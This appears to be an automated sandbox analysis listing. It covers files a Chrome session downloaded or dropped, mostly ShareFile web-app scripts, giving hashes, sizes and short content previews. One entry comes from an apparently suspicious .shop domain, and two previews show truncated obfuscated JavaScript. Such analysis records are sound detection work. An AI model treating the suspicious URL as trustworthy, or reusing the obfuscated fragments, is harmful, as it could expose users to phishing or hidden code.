                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.AutoComplete=e.AutoComplete,r.Avatar=e.Avatar,r.Badge=e.Badge,r.Button=e.Button,r.Col=e.Col,r.Collapse=e.Collapse,r.ConfigProvider=e.ConfigProvider,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Space=e.Space,r.Spin=e.Spin,r.Table=e.Table,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e,a,s={9178:(e,t,n)=>{"use strict";function r(e){var t,n,r=argu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1199131
                                                                                                                                                                                                                                                                                Entropy (8bit):5.79200612177758
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:56BzJtkDg9TOA3UAWXw53ov8iBqhH8kaLvtptHpITt8YwXlzzA:wlJyDg9TOA3UAWXviH8kaLvtptHpITtt
                                                                                                                                                                                                                                                                                MD5:5330D2180773E126082327CDE098052B
                                                                                                                                                                                                                                                                                SHA1:53699B2260BBD7DE7B5245FE2E3F090D50739096
                                                                                                                                                                                                                                                                                SHA-256:0F28074F0BEFAC89C11AFAAD402B60838DD059294FF897864A7F98522302F65B
                                                                                                                                                                                                                                                                                SHA-512:B402C757D0B9621DBC57691951FFA590C8B3CF0C086BE7FC65D1B1BCC3B4A9F3F2883D696709A3E6E927A2626C975BFA5EB3CB4728F29275F1F1C3A8A7CC6021
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},o={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.colorPalette=e.colorPalette},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Checkbox=e.Checkbox,r.Collapse=e.Collapse,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.Select=e.Select,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a["default"]=e["default"]},function(e){o.Redirect=e.Redirect},function(e){s.__awaiter=e.__awaiter,s.__rest=e.__rest}],execute:function(){e((()=>{var e,c,l={4300:(e,t,n)=>{"use strict";n.d(t,{A:()=>ae});var r=function(){function e(e){var t=this;this._insertTag=function(e){var n;n=0===t.tags.length?t.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65480)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):171393
                                                                                                                                                                                                                                                                                Entropy (8bit):5.34071588634098
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Xl14TWDE4jWnz9nzFYWDk4j5WDu4jEZblWDZ4jsnz6nzCj7oNYCjq4tk0mW8OKSB:Xl1QWj7oNYCm4thmW8OH
                                                                                                                                                                                                                                                                                MD5:41E01B6FF80BCB6F70560C42BA70E4B2
                                                                                                                                                                                                                                                                                SHA1:3D9F34E64011D49AEC791D706FA20081F23E0FF4
                                                                                                                                                                                                                                                                                SHA-256:DB5A6CDEC9DBB2097BB9101B7BDA2DD023997C508D1172DBF72525F34447C15E
                                                                                                                                                                                                                                                                                SHA-512:90A62B2EE342791246887ACFBC1FA91A08C6CDFF2DC28DC4147E414E815A465E61EDF508B1789D9094FA484ABACF7D268746A241E1CF2DE4A1F4C581EE0654D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.AppsEntity=e.AppsEntity,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMod
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1096693
                                                                                                                                                                                                                                                                                Entropy (8bit):5.133888503966434
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:sAzFiItthHPNqH8LzgYnpL7CoTDUwFH371EbIj8R2drzFmhbvAMw60FJIW9hDrs+:sAz7thvNqY/L1iC+vAx60UYDgrS
                                                                                                                                                                                                                                                                                MD5:D5D8AEB44E78059670F80199B4BAA9F7
                                                                                                                                                                                                                                                                                SHA1:A1D799AAB2C5A84D39BDEBB84229A70DAF2FA82E
                                                                                                                                                                                                                                                                                SHA-256:CCFCBFE3728AC461FE5B459E518D9AC53326EDA60F4DB8D5C06ECD6BF2285555
                                                                                                                                                                                                                                                                                SHA-512:29CFD62A36CB7532B6832DA3989F1AFF0B33F503EB11C8776DC1EA7D7568246771B85C800EA3296A0154ECF3D3869FB1A3739D3C66B43DE6BD008F81C4D97AEE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:var a0_0x2f87=['nonRepudiation','PUBLIC\x20KEY','key','encryptionParams','1VhORTK','24872iccYnq','Comment:\x20','totalFocusTime','close_notify','crcCalculator','getCipherSuite','DoNotTrackCollector','firstChild','Could\x20not\x20add\x20PKCS#7\x20signer;\x20unknown\x20message\x20digest\x20algorithm:\x20','TelemetryAcquisitionTime','_input','listAllCertificates','crc32','_tagLength','Gadugi','pools','ContentType','Updating\x20cookie\x20with\x20domain:\x20','none','detached','GesturalTelemetryCollector','getMetrics','EncryptedData.Version','endEvent','SimHei','KramerAndRio','EncryptedContentInfo.contentType','critical','WEBGL_DEBUG_EXTENSION','execute','MS\x20UI\x20Gothic','createClientKeyExchange','lastCollection','collect','shouldRefreshToken?\x20','makeLogger','Goudy\x20Old\x20Style','startEncrypting','putInt16','calculate','rsa','order','messageToPem','href','black','transition','createKeyPairGenerationState','FreesiaUPC','client_write_MAC_key','getTime','WST_Czec','aes256','Mangal','
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65342)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):232948
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9772469761951434
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:m9YnIWbn98fhRfvO5wlP7Qy9P3CV98IsYRElV6V6pz600I41r:pnIw98fsV986I6V6pz600I41r
                                                                                                                                                                                                                                                                                MD5:CD822B7FD22C8A95A68470C795ADEA69
                                                                                                                                                                                                                                                                                SHA1:1F139981B9B47A766EFA0A61BB78ADA351F16C4B
                                                                                                                                                                                                                                                                                SHA-256:3017DF4A76DB5F01C2B99B603D88B03106DF13BCFE18E67B7C13C2341D3A67DF
                                                                                                                                                                                                                                                                                SHA-512:6F641C4B94AC03CB59A1D703B464442E21AFE5268A4A4D6F0C70DA41175AD21B4F61667AD38EA5AF7909E5B00041DA55DA6980FF8BF4C1017D33253AFE90C802
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css
                                                                                                                                                                                                                                                                                Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.2 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65399)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):904512
                                                                                                                                                                                                                                                                                Entropy (8bit):5.71994782288608
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:qfKDRWFuEqilY7RuaOoFyXP10uAxa9WA3mVj/jEphnAj3wdArqUP4NqclO:qfKDlEqilY7Ru1SVoirqUP4NqclO
                                                                                                                                                                                                                                                                                MD5:4BCA71B5E96BA1017D2F126850C99835
                                                                                                                                                                                                                                                                                SHA1:E48A42C801197D142912941554398979EEE0A639
                                                                                                                                                                                                                                                                                SHA-256:6B98719775F73C629E39427EDF4D3A67506C6AF5E7ED2C9C80F630A1EE0ED03E
                                                                                                                                                                                                                                                                                SHA-512:9524339F39E746523AC7931388045BB5DDDDDD7D7E777543236188B95C78E4FEF1A493045C8BD6E48BC52B55017B3EE44B6A6E7577235AF6FA8C101D277F273B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.AlertErrorIcon=e.AlertErrorIcon,r.Button=e.Button,r.Checkbox=e.Checkbox,r.CircleOutlinedXIcon=e.CircleOutlinedXIcon,r.EmptyState=e.EmptyState,r.LoadingPrimary=e.LoadingPrimary,r.PageTitle=e.PageTitle,r.SettingsField=e.SettingsField,r.ThemeColor=e.ThemeColor,r.Toggle=e.Toggle,r.fromThemeColors=e.fromThemeColors,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess},function(e){o.__assign=e.__assign,o.__awaiter=e.__awaiter},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e={9272:(e,t,n)=>{"use strict";var r=n(723),o=[],i=[],a=r.makeRequestCallF
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:assembler source, ASCII text, with very long lines (1680), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):108159
                                                                                                                                                                                                                                                                                Entropy (8bit):5.196780313715235
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:3LUJAxdD1p1MQLnyAUXETVyyf8TSYGiB3hw8aZdZVXpgd7FJEZ4TfDt3DaIGTBML:3L4Ax1+euSY/B3hw8xd7FJEeDaIGTBML
                                                                                                                                                                                                                                                                                MD5:E3D75AA9A72BC3FC164CF84DF12CA2D4
                                                                                                                                                                                                                                                                                SHA1:16C3E732C1C4F72F28128C115CDE77D85C7DB5B0
                                                                                                                                                                                                                                                                                SHA-256:6B95363E75460560EC869EBF93B3B4333988C32A81F6280F61791581F1DD08ED
                                                                                                                                                                                                                                                                                SHA-512:636A03D04A20FE86EE16E849E5EE86AB799BCAC30C4989B7E664F8306A1A59CAC5A44BB486408190BC9F9CC15655414643D1EA29F6CA80F84930ECB6F869E031
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hrv56k8ryi.ferrovelho.shop/m/sm/U6UPYHP3YF8AQVXD4ZG42QH3R
                                                                                                                                                                                                                                                                                Preview:html { font-family: sans-serif; text-size-adjust: 100%; }..body { margin: 0px; }..article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; }..audio, canvas, progress, video { display: inline-block; vertical-align: baseline; }..audio:not([controls]) { display: none; height: 0px; }..[hidden], template { display: none; }..a { background-color: transparent; }..a:active, a:hover { outline: 0px; }..abbr[title] { border-bottom: 1px dotted; }..b, strong { font-weight: bold; }..dfn { font-style: italic; }..h1 { font-size: 2em; margin: 0.67em 0px; }..mark { background: rgb(255, 255, 0); color: rgb(0, 0, 0); }..small { font-size: 80%; }..sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; }..sup { top: -0.5em; }..sub { bottom: -0.25em; }..img { border: 0px; }..svg:not(:root) { overflow: hidden; }..figure { margin: 1em 40px; }..hr { box-sizing: content-box; height: 0px; }..pre { overflow: auto; }..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (61276), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):795817
                                                                                                                                                                                                                                                                                Entropy (8bit):5.678759319464712
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:ihDAYuC5jEWpcOZ5bcU1OHP6a05t3HZo3cA3UTStt1RX0b+iVQEQK/XvFZdnGKpI:DYuC3pxz1Oia3cd+nUbfQuO
                                                                                                                                                                                                                                                                                MD5:1EF237D0B6617D5D9E82D98839B65753
                                                                                                                                                                                                                                                                                SHA1:02560680FCAF4E0465D229D2E2A46F3D81C834BD
                                                                                                                                                                                                                                                                                SHA-256:5EB2E4375E3E1625F20F5E12F9CF0DDCC854166BB54F942D2F47003D86747AFC
                                                                                                                                                                                                                                                                                SHA-512:B6D2EEE2E64F4F7752E91EB0BDA3A81550D685EDA4565F36580FF47D08450583A043BA1E7E015629D4ADF77BCB2DE8A695695025716FC0E51BEE76C33A6D8835
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js
                                                                                                                                                                                                                                                                                Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={1757:(e,t,n)=>{"use strict";n.d(t,{F2:()=>u,ST:()=>s,UB:()=>c,lU:()=>l,pq:()=>a});var r=n(1413),o=n(8211);function a(e,t){if(f()&&d(e)){var n=i();window.__citrixui_internal__=(0,r.Z)((0,r.Z)((0,r.Z)({},n),t),{},{instanceSymbol:e})}}function i(){if(f())return window.__citrixui_internal__}function l(){var e,t=i();return null!==(e=null==t?void 0:t.configuration)&&void 0!==e?e:o.O}function c(){var e,t=i();return null!==(e=null==t?void 0:t.onNotification)&&void 0!==e?e:h}function s(){var e,t=i();return null!==(e=null==t?void 0:t.showModal)&&void 0!==e?e:p}function u(e){f()&&d(e)&&delete window.__citrixui_
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):226377
                                                                                                                                                                                                                                                                                Entropy (8bit):5.418095379957867
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:n1YhPOuYDEl23Y8rFYsXD2cpp4LvfQwRbErnOk:10PO1DEl2dZYsXD2cpp4DfQ7j3
                                                                                                                                                                                                                                                                                MD5:68B7D9CC403C9D5FF3D0C1F9EA0182C2
                                                                                                                                                                                                                                                                                SHA1:174DD1E16EB70EF76611B84A7BA30DBF0C4D0380
                                                                                                                                                                                                                                                                                SHA-256:AACFED7ED783550FAA9FCD616FB323CC101407670E0C2E4EC3F639E9534B9981
                                                                                                                                                                                                                                                                                SHA-512:FA3A4FB1AE99FF8AC1A4E5983E1186CD4BEBB904122E03AEC3FE2141F239EEB3D992D2A482488D988F77C1F911CA63DA8243DE3EBFAE65B8E6974A623E3CA07B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.sizes=e.sizes},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))}],execute:function(){e((()=>{var e,s,u,c,l={80780:(e,t,r)=>{"use strict";r.d(t,{A:()=>de});var n=r(58168),i=r(64467);function o(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):426355
                                                                                                                                                                                                                                                                                Entropy (8bit):4.912224246528829
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:6LKXwBc6xJun1jjpp0546TFxKnTecT7pqwrzBlRgbvO:LgBc6xJm1/pGnTLKTecTFqizHRmvO
                                                                                                                                                                                                                                                                                MD5:E05F0C0603EA36FDA2F26E329B994FE8
                                                                                                                                                                                                                                                                                SHA1:B9DF4A8E9119457CCED8B77607E98561E48ABC67
                                                                                                                                                                                                                                                                                SHA-256:E50720CEBCF4CF488A8C86EBDC38969DB72CF6BEDCB8E84405159343549CDDB1
                                                                                                                                                                                                                                                                                SHA-512:0FCBDFCC864CAE33DAE59AC24D6BC56452D1E68C4347B76456379686A70077EA4EB88CE28A0E04D3E5C0AACDDAB3C4488A29B27C65D4BA54A3013EEA0F56D49F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:function _0x49b429(_0x13321f,_0x2c20c7,_0x5c0056,_0x3818ef,_0x2df98e){return _0xa6a8(_0x3818ef- -0x30e,_0x2df98e);}(function(_0x3e4334,_0x1580f7){var _0x2a0896=_0x3e4334();function _0x3007b2(_0x44daf3,_0xca3662,_0x130911,_0x53577b,_0x1fe554){return _0xa6a8(_0xca3662-0x29,_0x130911);}function _0x465ad5(_0x1ae45f,_0xeeec23,_0x29f1db,_0xb9a73f,_0x1eb118){return _0xa6a8(_0x1ae45f-0x153,_0x29f1db);}function _0x3b19cd(_0x55502c,_0x4d137c,_0x66957f,_0x345c2a,_0x5af1c9){return _0xa6a8(_0x55502c-0x1e1,_0x5af1c9);}function _0x54200c(_0x3d0a5b,_0x508025,_0x5bb75a,_0x272da6,_0x5c29d0){return _0xa6a8(_0x3d0a5b- -0x2fd,_0x508025);}function _0x30f7ef(_0x2dd25b,_0x11eff8,_0x4474d9,_0x42d7cc,_0x3fa1e2){return _0xa6a8(_0x4474d9-0x3c5,_0x2dd25b);}while(!![]){try{var _0xe3473=-parseInt(_0x30f7ef(0x8bb,0x1f5,0x719,0x78f,0x72c))/(-0x15ee+0x1ebd+-0x8ce)*(parseInt(_0x465ad5(0x7ab,0x6dc,0xb9c,0x9a9,0x3eb))/(0x1833*0x1+-0x1350+-0x1*0x4e1))+-parseInt(_0x54200c(0xdc,0x3ca,0x42,0x5c5,0xbe))/(-0x138f*0x1+-0x12a2+-0
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65480)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):171393
                                                                                                                                                                                                                                                                                Entropy (8bit):5.34071588634098
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:Xl14TWDE4jWnz9nzFYWDk4j5WDu4jEZblWDZ4jsnz6nzCj7oNYCjq4tk0mW8OKSB:Xl1QWj7oNYCm4thmW8OH
                                                                                                                                                                                                                                                                                MD5:41E01B6FF80BCB6F70560C42BA70E4B2
                                                                                                                                                                                                                                                                                SHA1:3D9F34E64011D49AEC791D706FA20081F23E0FF4
                                                                                                                                                                                                                                                                                SHA-256:DB5A6CDEC9DBB2097BB9101B7BDA2DD023997C508D1172DBF72525F34447C15E
                                                                                                                                                                                                                                                                                SHA-512:90A62B2EE342791246887ACFBC1FA91A08C6CDFF2DC28DC4147E414E815A465E61EDF508B1789D9094FA484ABACF7D268746A241E1CF2DE4A1F4C581EE0654D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.AppsEntity=e.AppsEntity,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMod
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-data.customer.pendo.io/data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1728497131246&v=2.249.1_prod
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):98732
                                                                                                                                                                                                                                                                                Entropy (8bit):5.344399340470534
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Y6Z2P9/cG6kn0MO5lpt7ouF04pWX7HEFozgcH:gPTOXP7oum4w7RzRH
                                                                                                                                                                                                                                                                                MD5:CDCA5117242386D7CABB8C5CDEE3F9A1
                                                                                                                                                                                                                                                                                SHA1:E79CED8986A52C729CBBD2C876D0DC25C0FFD33D
                                                                                                                                                                                                                                                                                SHA-256:579901D2E27F2ED03F94DE3602CF3A15EDB7C307E6D0E325E663A8A75C81B036
